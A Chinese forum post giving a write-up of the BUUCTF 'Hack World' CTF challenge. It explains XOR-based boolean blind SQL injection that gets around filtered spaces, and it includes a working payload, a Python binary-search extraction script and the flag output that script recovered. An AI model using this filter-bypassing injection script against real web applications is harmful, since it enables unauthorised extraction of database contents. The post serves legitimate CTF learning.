设为首页收藏本站
切换到窄版

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
分享屋»论坛 资源屋 网络安全:渗透测试 BUUCTF靶场32 -- [CISCN2019 华北赛区 Day2 Web1]Hack W ...
返回列表 发新帖
查看: 164|回复: 0

BUUCTF靶场32 -- [CISCN2019 华北赛区 Day2 Web1]Hack World

[复制链接]
mind

2万

主题

162

回帖

18万

积分

管理员

积分
184732
发表于 2022-9-5 23:09:09 | 显示全部楼层 |阅读模式 IP:山东省 移动/数据上网公共出口

登录后更精彩...O(∩_∩)O...

您需要 登录 才可以下载或查看,没有账号?立即注册

×
BUUCTF靶场32 -- [CISCN2019 华北赛区 Day2 Web1]Hack World
读题

sql注入题,而且直接告诉你flag在表flag中的flag字段。让你提交查询id
1.png

  • 查询1和2会有回显,输入其它数值都会提示错误。
  • 抓包跑一下字典看一下过滤的内容(学到的新技能,原来bp的intruder还能这样用),字典的内容就是常见的sql注入的一些函数名、符号啥的
  • 不过有一点是,BUU有限制,访问太快会提示429拒绝访问,所以,需要设置一下延时,我这个设置的有点慢。。。


  • 跑完看返回的报文,返回长度有493、492、482、472。分别对应不同的回显
  • 493


  • 492

  • 482
  • 472
  • 主要是482的过滤和472返回的fool,也没有其它回显,所以猜测布尔盲注。但是空格、 or、and 都被过滤了
  • 接下来的操作又是新的知识点

研究一、sql异或运算

  • 了解参考这篇文章

  • 大概在这里应用就是假^假 =真 ,真^真=假,假^真=真,真^假=真

  • 当我们查询 1^0、0^1、和 1 的回显是一样的,而查询 1^1 或0^0却会有报错提示。

  • 所以结合 sql语句 ,我们可以构造0^payload,若为payload结果真,则返回1,0^1=1,将得到查询id=1时的结果,回显Hello, glzjin wants a girlfriend。

  • 但如何构造payload,因为空格被过滤,所以用括号来代替分割,这里也算学的新方法,利用ASCII码来逐一匹配



[AppleScript] 纯文本查看 复制代码
   0^(ascii(substr((select(flag)from(flag)),1,1))>1)


  • 肯定不可能手工盲注,所以,还是 python 脚本

  • 这是一位师傅的脚本,设置了延时,防止429, 用二分法成功得到flag



[Python] 纯文本查看 复制代码
import requests
import time
import re
url='http://04d17768-be6a-45cd-9587-3b8faf1a8506.node3.buuoj.cn/index.php'
flag = ''
for i in range(1,43):
    max = 127
    min = 0
    for c in range(0,127):
        s = (int)((max+min)/2)
        payload = '0^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
        r = requests.post(url,data = {'id':payload})
        time.sleep(0.005)
        if 'Hello, glzjin wants a girlfriend.' in str(r.content):
            min=s
        else:
            max=s
        if((max-min)<=1):
            flag+=chr(max)
            print(flag)
            break

[Plain Text] 纯文本查看 复制代码
f
fl
fla
flag
flag{
flag{7
flag{76
flag{76a
flag{76ae
flag{76aed
flag{76aed1
flag{76aed13
flag{76aed138
flag{76aed138-
flag{76aed138-3
flag{76aed138-31
flag{76aed138-312
flag{76aed138-3126
flag{76aed138-3126-
flag{76aed138-3126-4
flag{76aed138-3126-4a
flag{76aed138-3126-4af
flag{76aed138-3126-4af3
flag{76aed138-3126-4af3-
flag{76aed138-3126-4af3-a
flag{76aed138-3126-4af3-ad
flag{76aed138-3126-4af3-ad0
flag{76aed138-3126-4af3-ad0e
flag{76aed138-3126-4af3-ad0e-
flag{76aed138-3126-4af3-ad0e-c
flag{76aed138-3126-4af3-ad0e-c6
flag{76aed138-3126-4af3-ad0e-c63
flag{76aed138-3126-4af3-ad0e-c635
flag{76aed138-3126-4af3-ad0e-c6356
flag{76aed138-3126-4af3-ad0e-c6356e
flag{76aed138-3126-4af3-ad0e-c6356ec
flag{76aed138-3126-4af3-ad0e-c6356ec3
flag{76aed138-3126-4af3-ad0e-c6356ec39
flag{76aed138-3126-4af3-ad0e-c6356ec39b
flag{76aed138-3126-4af3-ad0e-c6356ec39bb
flag{76aed138-3126-4af3-ad0e-c6356ec39bb3
flag{76aed138-3126-4af3-ad0e-c6356ec39bb3}
[Finished in 31.1s]

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|哩布大模型|Civitai大模型|IP定位|图反推|站长素材|deepseek|即梦视频|阿狗工具|花瓣网|pinterest|php手册|宝塔文档|CyberChef|猫捉鱼铃|手机版|小黑屋|下载狗|IPS|在线工具|分享屋 ( 鲁ICP备2021028754号 )

GMT+8, 2025-5-5 09:15

Powered by 分享屋 X3.5 Licensed

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表